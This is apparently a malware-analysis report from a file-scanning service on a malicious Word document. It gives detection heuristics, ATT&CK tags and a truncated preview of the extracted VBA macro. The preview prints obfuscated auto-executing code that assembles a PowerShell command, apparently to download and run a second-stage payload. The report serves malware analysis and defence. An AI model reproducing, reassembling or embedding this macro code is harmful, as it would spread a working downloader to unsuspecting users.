MALICIOUS
182
Risk Score
Malware Insights
MITRE ATT&CK
T1566.001 Spearphishing Attachment
T1059.005 Visual Basic
The sample is a malicious Office document containing a VBA macro. The macro is configured to auto-execute via the AutoOpen function and uses obfuscated string concatenation to construct and execute a PowerShell command. This command is likely intended to download and execute a second-stage payload, as indicated by the 'Doc.Downloader' ClamAV detection name.
Heuristics 6
-
ClamAV: Doc.Downloader.Valyria-6666903-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Valyria-6666903-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 49670 bytes |
SHA-256: 481640d2903e020feaad8f8cdca6d718a548d77eb0477897862f92299bcf4188 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ROwarMvqnjb"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "lRsNWZCwJkzG"
Function VVjinsUG()
On Error Resume Next
VarType TypeName(njbOA - rcbiia)
VarType 73547 - 81888
sEWcVu = "mD" + " " + " " + "/v^ ^" + " /c" + " " + CStr(Chr(ItmZjiErTu + vkDLMBSKdjWrjt + 34 + uBrWFcSRKHsos + RlWfIbuaR)) + "SeT " + "^ " + "V^x" + "J^=^p" + "^o" + "^we" + "rs" + "@e^"
IsArray ibiiOF - FtiOzG
VIPbZF = 75523 + 13715
VIPbZF = ioShd * CbXbq / 72238 / NwYnQ
VarType ahAqYH / RNkJm
LwqoZkK = "l" + "^l" + "^" + " ^" + "-e ^J^A" + "B" + "vA" + "E8Aa^Q^" + "A" + "9^" + "AG^" + "4^"
VarType Rnd(FIsSDU)
VIPbZF = 41134 - aBbQiv / 82984 - wNbzG
vnnJBRnjMlP = "A^" + "ZQ^B^" + "3AC" + "0A" + "^b^wB" + "]^AG^" + "o^A"
IsArray Str(AtFIu)
VarType asvFb + vSVZfa - 28520 + tPFvA
VIPbZF = 19960 - iChiSw + jwGTzd + 53624
mRDOShacr = "Z^QB^j^" + "A^iQ" + "^A" + "'A^" + "B^,AGU" + "A^dA^Au" + "^A" + "F^\^" + "AZQ^B]^"
VIPbZF = Round(48544 / PwRXq * 91147 - iBAUm)
VIPbZF = CDate(qYUMt)
VarType kJfOs + tOzip
qqOIJufz = "A" + "E^MA^b^" + "A^B^p^" + "A^G" + "U" + "Ab("
VarType 88604 / XmnEjp
IsArray zrHfG + 49389
uVLiN = "^" + "B^0^ADs" + "^A^JA" + "^BJ^A" + "^iY^AZ" + "AA9^A"
VIPbZF = Sgn(82)
VarType CDate(275787575)
kQMBH = "C^\A^a^" + "AB0" + "^A" + "iQA\^AA" + "^_AC8" + "AL^w" + "A[" + "^" + "A" + "^"
VarType CoDPuB * ftGHB
VIPbZF = Sqr(46915 / iiRUs)
VarType Tan(44136 - CmUXZ * 98111 - Yzocc)
VIPbZF = 10155 * jOCwW - 75150 / dwPEb
VarType Month(89529 * vGQRZi)
WVSvfziazSE = "G" + "0^A^" + "d" + "^Q^" + "B^[A^G" + "^k^A^Y^" + "w^Au^AG" + "4AZ" + "Q^B" + "^0AC^8"
VIPbZF = CCur(59837 + 71276 - 16026 + AlCzc)
VIPbZF = Int(233761844)
hTMLItGzNwa = "A^,Q" + "BV" + "A^F^oA" + "a" + "(BA" + "^" + "AG" + "(Ad^A^" + "B^0A^"
IsArray 78275 / hjfOiR / 85188 / roZTP
IsArray TimeValue(TizrJD)
VIPbZF = Fix(ikTIm / iiKwJv / 29034 + psAjRt)
doGbM = "i^A" + "^A^,(" + "AvAC8Aa" + "(^BvAG" + "^'A^YQ" + "^"
VarType 62421 * NXJpR
VIPbZF = 54771 + nrwDzu * ctRrS * vrmLd
VIPbZF = nAYziP + GbJFO
VarType Second(pjNXLQ - MazMc * 5657 / NjBaR)
VIPbZF = Int(sLipE)
sfavqkkvc = "B" + "yA^G^'^" + "A^YQ" + "^" + "A^u^"
VVjinsUG = sEWcVu + LwqoZkK + vnnJBRnjMlP + mRDOShacr + qqOIJufz + uVLiN + kQMBH + WVSvfziazSE + hTMLItGzNwa + doGbM + sfavqkkvc
VarType Month(PoWCjz)
IsArray LCase(52361 - 99299 * wDiYs - 64217)
VarType CDate(1869)
VarType Sgn(808)
End Function
Function jojspvYDmX()
On Error Resume Next
IsArray 4949 + FOQUiK
VarType Fix(MbjqUZ)
aYzJMcQT = "A" + "^G^M" + "^A^bwB" + "t" + "^AC8Adw" + "B^w" + "^AC" + "0^AY^"
VarType XriWld / FJCch - qowWjI + PPJKtP
VarType Fix(FjEXk - ALYXT)
IsArray CVar(28677 * YIICc)
VarType Atn(90219 - wqrWRI)
hlNCWOST = "wBvA" + "G4" + "^" + "A^d" + "^AB" + "^" + "l^" + "AG4A^" + "d^A^A" + "vA" + "^D\A^"
IsArray Log(55830 - FizZz)
WlwKDIPkV = ".(B^k" + "A^" + "i'^" + "Ad(^" + "B^0A^" + "Gw^A" + "^" + "Q^AB^o" + "^A^" + "i^Q" + "^A^d^A"
IsArray 67795 / dXwPXX - 256 - ACqmmX
VarType Tan(NfNjsc)
USnai = "^" + "B^w" + "A^" + "D^o^A^" + "Lw^Av" + "Ai^\^Ad" + "wB3A" + "C^4A^e"
IsArray CDate(fjPzLD)
AfSIKK = "^" + "Q" + "B^}AG" + "^EAb" + "(B{" + "AG(" + "A^" + "d^" + "QB^@^" + "AC4AY" + "^w^B" + "v^A^" + "G^0A"
IsArray Second(RWzbUw - 33279 * hQmjS * oojYk)
qCkwqB = "Lw^BVA" + "E^A^A^a" + "^AB^" + "0^" + "A^i^Q"
jojspvYDmX = aYzJMcQT + hlNCWOST + WlwKDIPkV + USnai + AfSIKK + qCkwqB
VIPbZF = Hex(SERsr * qpwltr)
End Function
Function KBZHEC()
On Error Resume Next
IsArray TimeValue(mLPRZu)
VIPbZF = Val(OMVbL)
IsArray 59589 * szQEv / bHhbs + ApbFz
tkiojUMMj = "A\^A^A_" + "^" + "AC^8A" + "LwB0A^G" + "(AZQ"
IsArray Str(ViYFd)
VarType Sin(fWIfO)
IsArray Atpkq * kHkzCW + ZlQcJ - SzKZLa
VarType Month(vlYwi / johQPL)
AsHwcfUZCi = "^" + "B
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.